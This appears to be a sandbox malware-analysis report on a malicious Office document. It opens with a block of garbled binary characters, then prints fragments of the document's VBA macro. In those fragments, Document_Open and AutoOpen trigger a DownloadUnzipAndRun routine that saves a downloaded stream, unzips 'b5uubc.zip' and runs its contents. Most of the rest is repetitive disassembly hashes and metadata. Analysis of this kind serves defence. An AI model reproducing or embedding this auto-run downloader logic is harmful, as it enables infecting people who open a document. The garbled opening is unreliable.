??*????????\x15?\xfffd????????????\xfffd??????????=??????\xfffd????\xfffd??????U??????U??????z???\x0e????????????????????\xfffd??R?????T??????????x???\xfffd?????????\x0e????\xfffd???\xfffd??????r?????W??????????\????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????r??????????????????????????????????????????????????????????????????????????????????????????<????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????"??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????U?????????????????????????????????????????+?????????:?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????

                                                                                    executed
                                                                                    19

                                                                                    oStream.SaveToFile fileOutPath, 2

                                                                                    SaveToFile

                                                                                    20

                                                                                    oStream.Close

                                                                                    Close

                                                                                    21

                                                                                    Endif

                                                                                    22

                                                                                    End Sub

                                                                                    Subroutine

                                                                                    Document_OpenAPIs: 3, Strings: 0, Number of lines: 3, Relevance: 6.003

                                                                                    APIsMeta Information

                                                                                    Part of subcall function DownloadUnzipAndRun@ThisDocument: MkDir

                                                                                    Part of subcall function DownloadUnzipAndRun@ThisDocument: CreateObject

                                                                                    Part of subcall function DownloadUnzipAndRun@ThisDocument: Run

                                                                                    LineInstructionMeta Information
                                                                                    64

                                                                                    Sub Document_Open()

                                                                                    65

                                                                                    DownloadUnzipAndRun

                                                                                    executed
                                                                                    66

                                                                                    End Sub

                                                                                    Subroutine

                                                                                    AutoOpenAPIs: 3, Strings: 0, Number of lines: 3, Relevance: 6.003

                                                                                    APIsMeta Information

                                                                                    Part of subcall function DownloadUnzipAndRun@ThisDocument: MkDir

                                                                                    Part of subcall function DownloadUnzipAndRun@ThisDocument: CreateObject

                                                                                    Part of subcall function DownloadUnzipAndRun@ThisDocument: Run

                                                                                    LineInstructionMeta Information
                                                                                    67

                                                                                    Sub AutoOpen()

                                                                                    68

                                                                                    DownloadUnzipAndRun

                                                                                    executed
                                                                                    69

                                                                                    End Sub

                                                                                    Function

                                                                                    GenerateRandomValueAPIs: 6, Strings: 0, Number of lines: 6, Relevance: 7.506

                                                                                    APIsMeta Information

                                                                                    Randomize

                                                                                    Trim

                                                                                    Str

                                                                                    Int

                                                                                    Rnd

                                                                                    lowerbound

                                                                                    LineInstructionMeta Information
                                                                                    33

                                                                                    Function GenerateRandomValue() as String

                                                                                    34

                                                                                    Dim randomNum as String

                                                                                    executed
                                                                                    35

                                                                                    Randomize

                                                                                    Randomize

                                                                                    36

                                                                                    randomNum = Trim(Str(Int((10000000 - 11 + 1) * Rnd + lowerbound)))

                                                                                    Trim

                                                                                    Str

                                                                                    Int

                                                                                    Rnd

                                                                                    lowerbound

                                                                                    37

                                                                                    GenerateRandomValue = randomNum

                                                                                    38

                                                                                    End Function

                                                                                    Subroutine

                                                                                    UnzipAPIs: 4, Strings: 0, Number of lines: 9, Relevance: 5.009

                                                                                    APIsMeta Information

                                                                                    NameSpace

                                                                                    NameSpace

                                                                                    CopyHere

                                                                                    Items

                                                                                    LineInstructionMeta Information
                                                                                    23

                                                                                    Sub Unzip(dirr as String)

                                                                                    24

                                                                                    Dim sh as Shell32.Shell

                                                                                    executed
                                                                                    25

                                                                                    Dim sf as Shell32.Folder

                                                                                    26

                                                                                    Dim df as Shell32.Folder

                                                                                    27

                                                                                    Set sh = New Shell32.Shell

                                                                                    28

                                                                                    Set df = sh.NameSpace(dirr)

                                                                                    NameSpace

                                                                                    30

                                                                                    Set sf = sh.NameSpace(dirr & "b5uubc.zip")

                                                                                    NameSpace

                                                                                    31

                                                                                    df.CopyHere sf.Items

                                                                                    CopyHere

                                                                                    Items

                                                                                    32

                                                                                    End Sub

                                                                                    Reset < >

                                                                                      Executed Functions

                                                                                      Function 00007FFD99E12728 Relevance: 1.6, Strings: 1, Instructions: 324COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {'
                                                                                      • API String ID: 0-2381349322
                                                                                      • Opcode ID: 3a326c6fb2ebd8a2025f1961bc843228529f2bfd52103139ca9600c0accc6bfe
                                                                                      • Instruction ID: 7799670c32411c66885be216a2fbbd426facf330e1fa80368b8cf491312c1a92
                                                                                      • Opcode Fuzzy Hash: 3a326c6fb2ebd8a2025f1961bc843228529f2bfd52103139ca9600c0accc6bfe
                                                                                      • Instruction Fuzzy Hash: FD910872F1D9494FDB74EB6C98956B9B7E1EF98714F00017AE04ED3286DE24A8428742
                                                                                      Function 00007FFD99E10E18 Relevance: 1.6, Strings: 1, Instructions: 322COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {'
                                                                                      • API String ID: 0-2381349322
                                                                                      • Opcode ID: 4cf5082b75690276c5b2bc1f4939713c6472eaab465f726ae299263daa80c239
                                                                                      • Instruction ID: 091b08ac01fe33f5fc210372b748d099b449c58ae4ff68eb998fd30cc32ca8c2
                                                                                      • Opcode Fuzzy Hash: 4cf5082b75690276c5b2bc1f4939713c6472eaab465f726ae299263daa80c239
                                                                                      • Instruction Fuzzy Hash: 9991F871F1D9494FDB74EB6C9895ABDB7E1EF98714F00017AE04ED3286DE24A8428782
                                                                                      Function 00007FFD99E10E28 Relevance: .3, Instructions: 284COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 10fc1947959f35bbd06d20c046c916b0c839a24584e64b5f44c13491d0bf92d3
                                                                                      • Instruction ID: 9520ca486da04b246fe6c1f902574a1aa666022eb15964907849f6d51bb198f8
                                                                                      • Opcode Fuzzy Hash: 10fc1947959f35bbd06d20c046c916b0c839a24584e64b5f44c13491d0bf92d3
                                                                                      • Instruction Fuzzy Hash: 9D711731B0CE494FD768EF6C9865AB9B7E1EF98315F04427ED04EC3395DE25A8428782
                                                                                      Function 00007FFD99E10E38 Relevance: .3, Instructions: 275COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c4e9b073ea20ef00f060385b7973f21af5ad27066abb7f2f07d02947d5e16041
                                                                                      • Instruction ID: 019c2c7e38251cab7ded74c3cf81dfb141b4b1664ebb0622d87b7fb5b287650f
                                                                                      • Opcode Fuzzy Hash: c4e9b073ea20ef00f060385b7973f21af5ad27066abb7f2f07d02947d5e16041
                                                                                      • Instruction Fuzzy Hash: C3715771B0CA484FDB69DE5C98556BAB7E1EB98324F00427FE04DD3296DE35A8028782
                                                                                      Function 00007FFD99E113ED Relevance: .2, Instructions: 191COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b7f4bfe4964ca281d881f92212867840f03dfacd25ebaeefb5d01f18e142d8a8
                                                                                      • Instruction ID: 2283a56fe966adb8317a3b0d216951e5ea8d4edd08db6dbcc0998d1e0da1f222
                                                                                      • Opcode Fuzzy Hash: b7f4bfe4964ca281d881f92212867840f03dfacd25ebaeefb5d01f18e142d8a8
                                                                                      • Instruction Fuzzy Hash: 2F711E70E0A6599FDBA4EFA4C8A56ECBBF1EF45305F4044B9D049EB2A2CE356C45CB01
                                                                                      Function 00007FFD99E118C7 Relevance: .2, Instructions: 167COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 34f78d63fd510373e4d7784bad521fe197f54b032f52b5624315545f9c7c0fb0
                                                                                      • Instruction ID: fed28bf47a917c19fb7d1f4308852a9f556f290b91a14155ebd1afd0e2ec5770
                                                                                      • Opcode Fuzzy Hash: 34f78d63fd510373e4d7784bad521fe197f54b032f52b5624315545f9c7c0fb0
                                                                                      • Instruction Fuzzy Hash: 1A518171F1EA4A4BDF68DE9888B16BC77E1EF98308F140179D05DA3292CE266841C752
                                                                                      Function 00007FFD99E108B9 Relevance: .2, Instructions: 167COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 82d3be3f9861d8c9e3a1ad9562458f70e22f522c91c6a19be46fe6809c59bd23
                                                                                      • Instruction ID: 3cb90e97bbf9c8c65cb51c0cad52c0505997dd0bb2c9d44c4321fe7d33208dbf
                                                                                      • Opcode Fuzzy Hash: 82d3be3f9861d8c9e3a1ad9562458f70e22f522c91c6a19be46fe6809c59bd23
                                                                                      • Instruction Fuzzy Hash: A651E532A0E6D90EE7725AB458765E97BE0DF86325F0901FBD48CDB0D3D81A1D0A8393
                                                                                      Function 00007FFD99E11B35 Relevance: .1, Instructions: 149COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f9dcc8e724b9241a71c7f39c75ab4bc85e5b94bdcfb10cb1ccecd6fd4098af42
                                                                                      • Instruction ID: e419ec19f1854b3bf17ee63f982dfd946a20bc94cc7ab1d258d48c4944a65ba5
                                                                                      • Opcode Fuzzy Hash: f9dcc8e724b9241a71c7f39c75ab4bc85e5b94bdcfb10cb1ccecd6fd4098af42
                                                                                      • Instruction Fuzzy Hash: D2513F7160DA8A8FDBACDF18C8A4A7537A1FF59308B1405ADE469C72D2CB36E852C741
                                                                                      Function 00007FFD99E111C7 Relevance: .1, Instructions: 149COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2c48bdbb9351fa4528f2cd0ae327862f3389fd189325a8641a36b193dc4f0d35
                                                                                      • Instruction ID: b3457d7c30c1d51d3951386c7dd68d265f8e120ecfe293ccb330f48909bcbd81
                                                                                      • Opcode Fuzzy Hash: 2c48bdbb9351fa4528f2cd0ae327862f3389fd189325a8641a36b193dc4f0d35
                                                                                      • Instruction Fuzzy Hash: 40515F30B0E54A4FEBB5EFA484A17F97391AF45309F444578E45E876C7CE2AB881C642
                                                                                      Function 00007FFD99E12203 Relevance: .1, Instructions: 126COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1d63f358a6c0de8f7163d85cd24ae7034c3a415077ef40ab7bcf062ce54ca1b4
                                                                                      • Instruction ID: 457e2025c414400f636388df8450bd9485aade292acb2bc3bca0f8ba4c130134
                                                                                      • Opcode Fuzzy Hash: 1d63f358a6c0de8f7163d85cd24ae7034c3a415077ef40ab7bcf062ce54ca1b4
                                                                                      • Instruction Fuzzy Hash: 71319231908A0C8FDB68DF58D849BB9B7F1FB98315F00822ED00EE3655CF71A8568B81
                                                                                      Function 00007FFD99E10E30 Relevance: .1, Instructions: 112COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0de00e6342853bd0cb7a824a08dc1d57dd9fbec679f61a44eafe59ea6edb0d85
                                                                                      • Instruction ID: 4cbe51d935a366bb8cdefef33ef9b7bf081412dc1a481356fd67086da2613189
                                                                                      • Opcode Fuzzy Hash: 0de00e6342853bd0cb7a824a08dc1d57dd9fbec679f61a44eafe59ea6edb0d85
                                                                                      • Instruction Fuzzy Hash: 36310760B1CB841FE314AB784C6B5BABBD1DF8A604F08457DF48AC32D7DC15B8028287
                                                                                      Function 00007FFD99E12E1F Relevance: .1, Instructions: 110COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c9ca15f91fd81c16a6440a0c4661657a73d4ff0c4f6c25c89b3a081f4bb34f3b
                                                                                      • Instruction ID: bacf41ad26fbd2b395660b792f18941119318c182e842268e51e047197167276
                                                                                      • Opcode Fuzzy Hash: c9ca15f91fd81c16a6440a0c4661657a73d4ff0c4f6c25c89b3a081f4bb34f3b
                                                                                      • Instruction Fuzzy Hash: DB31E420B1CB841FE314AB78486B5BABBD1DF8A605F0845BEF489C32D7DD55A8468287
                                                                                      Function 00007FFD99E12A5A Relevance: .1, Instructions: 92COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7c2edca73306fac7de29046b384674338427223e8fda7413d34188482fb60863
                                                                                      • Instruction ID: 6a6a04ead2b8719a0f188e2c8b640b9191541bef4c36f58518a0eaed64735205
                                                                                      • Opcode Fuzzy Hash: 7c2edca73306fac7de29046b384674338427223e8fda7413d34188482fb60863
                                                                                      • Instruction Fuzzy Hash: 5B21473061EAC60FD7779B7848614B57FE0EF4221970501FBE088CB2A3DE19D842C342
                                                                                      Function 00007FFD99E12F1F Relevance: .1, Instructions: 88COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8828ea64f7fed6a5c3d20888821306dbf80cb2fc006c6afbe6104edcb5450420
                                                                                      • Instruction ID: 4f9ea2135e4e3f636906b148299eddd9ea5233253b741ee6983a5a9ac4678670
                                                                                      • Opcode Fuzzy Hash: 8828ea64f7fed6a5c3d20888821306dbf80cb2fc006c6afbe6104edcb5450420
                                                                                      • Instruction Fuzzy Hash: F511E963F0DA860FE776562C68622B96BC1DB8A1A8B4441FBD049D76D7ED1A58034382
                                                                                      Function 00007FFD99E107A8 Relevance: .1, Instructions: 85COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 94e25764384f45be63e8f9afd4a2adc956109366c35d9d4cfc1e693abbfba728
                                                                                      • Instruction ID: 19f40234e09e6253a3d07cdbbbede0f5f3c0edc3bfaff95c60b771a41325a27b
                                                                                      • Opcode Fuzzy Hash: 94e25764384f45be63e8f9afd4a2adc956109366c35d9d4cfc1e693abbfba728
                                                                                      • Instruction Fuzzy Hash: 32112621F1CD1D0FEAB4EF6C54AA67977C1EF9C219B0402BAE44DC3296DC26AC4143C2
                                                                                      Function 00007FFD99E1092D Relevance: .1, Instructions: 84COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9393177de1ec5c0871aff78757a724508f255c73c46ce37e6971931556ba99d4
                                                                                      • Instruction ID: 5787a206faa4ae57115e3aa2fd03e42618c5fca7a4c8848cba3f382e9f7bae11
                                                                                      • Opcode Fuzzy Hash: 9393177de1ec5c0871aff78757a724508f255c73c46ce37e6971931556ba99d4
                                                                                      • Instruction Fuzzy Hash: 6C210432E0E99E4FF7B0AAA448B16BA7AD1EF85319F0401B6D45DC30C3DD2A2D194283
                                                                                      Function 00007FFD99E13E00 Relevance: .1, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0b7fb845e0ba702f98c734170d1769a0a63813fe834bd0e0fa6e978e62a6ecd1
                                                                                      • Instruction ID: fe09d8af3311478b2c1223d46842f5fbe2874ee53ca1df952d613e5cbdb56da6
                                                                                      • Opcode Fuzzy Hash: 0b7fb845e0ba702f98c734170d1769a0a63813fe834bd0e0fa6e978e62a6ecd1
                                                                                      • Instruction Fuzzy Hash: 2411A310E0EBD51FE762A6B818B61E97FD0CF4B555B0949EFD4C9C71E3D809588B4342
                                                                                      Function 00007FFD99E117C9 Relevance: .0, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e548d12bb6e193d54924a48e173409b5d01f83692938c6dcc175802c8305d7dc
                                                                                      • Instruction ID: 1c06a958b6d2cd2b30faaeb1e2357a1388eaa898d8bc5f76382d46181f5cfa1e
                                                                                      • Opcode Fuzzy Hash: e548d12bb6e193d54924a48e173409b5d01f83692938c6dcc175802c8305d7dc
                                                                                      • Instruction Fuzzy Hash: 9B01D43160DBC91FC795DB18D4A05A67BE1EF85324F44057EF089C6292CA2599408782
                                                                                      Function 00007FFD99E10DF8 Relevance: .0, Instructions: 45COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7b3d5aa1fb601c83675cd60d3ace1104fc0c44d7ba3acc2df0046e01a5df1866
                                                                                      • Instruction ID: cdaab2c2eeb3777444dac971cba80a04c87991ea433ee820519cfae1fc8b9f6e
                                                                                      • Opcode Fuzzy Hash: 7b3d5aa1fb601c83675cd60d3ace1104fc0c44d7ba3acc2df0046e01a5df1866
                                                                                      • Instruction Fuzzy Hash: 1FF0A97161DB495BD7A8DA48D4A057B77D1FFC8354F44053EF04AD3350CE62D8418782
                                                                                      Function 00007FFD99E11A60 Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9e49409877c2401f891850059c4c41b359974a155694d785cdf5a7756b56ffd3
                                                                                      • Instruction ID: 5a4e856679cf63666b5aba78f61d71a4704aa7db9da9297ead49480da1dad5e4
                                                                                      • Opcode Fuzzy Hash: 9e49409877c2401f891850059c4c41b359974a155694d785cdf5a7756b56ffd3
                                                                                      • Instruction Fuzzy Hash: C7E0D872A0DB4C4FDB74AE59A8645E97BA4EB85318F040069E45DC6281D6226885C352
                                                                                      Function 00007FFD99E10CFD Relevance: .0, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 70e8918fe7371c9bab7c28701d053cb59719dfdc8c999140cfded29c7f65db44
                                                                                      • Instruction ID: f8da2cb99852476daf7e7f9bb01bb9555d9c600ee672a5b5ee5a5ba0cd79f433
                                                                                      • Opcode Fuzzy Hash: 70e8918fe7371c9bab7c28701d053cb59719dfdc8c999140cfded29c7f65db44
                                                                                      • Instruction Fuzzy Hash: 62E0C221F5980E4AEB60BBB42C7AAFDB286DFC8209FC40831E01DC20DBCD2A29054183
                                                                                      Function 00007FFD99E10C57 Relevance: .0, Instructions: 16COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 16221b124af57809d56b8f66c6381ec09069ae95c286170e2da7745caba2f83e
                                                                                      • Instruction ID: cce907de919db462496fd9d0dcac8b74667b44b8ac92543a6a364fef783741e3
                                                                                      • Opcode Fuzzy Hash: 16221b124af57809d56b8f66c6381ec09069ae95c286170e2da7745caba2f83e
                                                                                      • Instruction Fuzzy Hash: 79D05E3152CB098BD354DF14E4508DAB7A0FF84330F840B2DF06EC61D5DE75A6818686
                                                                                      Function 00007FFD99E1090A Relevance: .0, Instructions: 14COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b9d8508e16e0ab35fcb6c3f6212fd4d6bcfe770c4e709788bc7734a6de41188f
                                                                                      • Instruction ID: e218d6bba87b0aba2edc1d206fba19b09f2089688cdae69d17d87de307abd7a1
                                                                                      • Opcode Fuzzy Hash: b9d8508e16e0ab35fcb6c3f6212fd4d6bcfe770c4e709788bc7734a6de41188f
                                                                                      • Instruction Fuzzy Hash: E2C0123365C6094AC711A654E4A1CEEB360EF942A8F440B3AF04A910A5DD5967858682

                                                                                      Non-executed Functions

                                                                                      Function 00007FFD99E10480 Relevance: 7.9, Strings: 6, Instructions: 380COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ?O_I$O_^ $O_^"$O_^0$O_^2$O_^4
                                                                                      • API String ID: 0-1006404795
                                                                                      • Opcode ID: 22a74456931afaadc8641faa9209ef7d3943882caa69d23e3fe87d19448fbc0a
                                                                                      • Instruction ID: bd4db2776861abc4c8d6816357f64598c8bbcd9c8fc833821d6534a767eb85e2
                                                                                      • Opcode Fuzzy Hash: 22a74456931afaadc8641faa9209ef7d3943882caa69d23e3fe87d19448fbc0a
                                                                                      • Instruction Fuzzy Hash: 74B11A17B0E1964FD3227E6CA8B54E53F90DFC122D70D41B7D09C8E1E7EC09694A8296
                                                                                      Function 00007FFD99E10650 Relevance: 7.7, Strings: 6, Instructions: 214COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ?O_I$O_^ $O_^"$O_^0$O_^2$O_^4
                                                                                      • API String ID: 0-1006404795
                                                                                      • Opcode ID: 0d08657d93b10044d17fd8c1320c0953426858e245c737b560f055f7f7ea63b6
                                                                                      • Instruction ID: 7c06514b7734127b0788515837adf93d73093c5abb0b730d2110b3ed0c723494
                                                                                      • Opcode Fuzzy Hash: 0d08657d93b10044d17fd8c1320c0953426858e245c737b560f055f7f7ea63b6
                                                                                      • Instruction Fuzzy Hash: 44512857B0F1D50FE7627AAC68B50E92F909FC122D70D41F7D0D88E1EBE809694A8296
                                                                                      Function 00007FFD99E106A0 Relevance: 7.7, Strings: 6, Instructions: 177COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
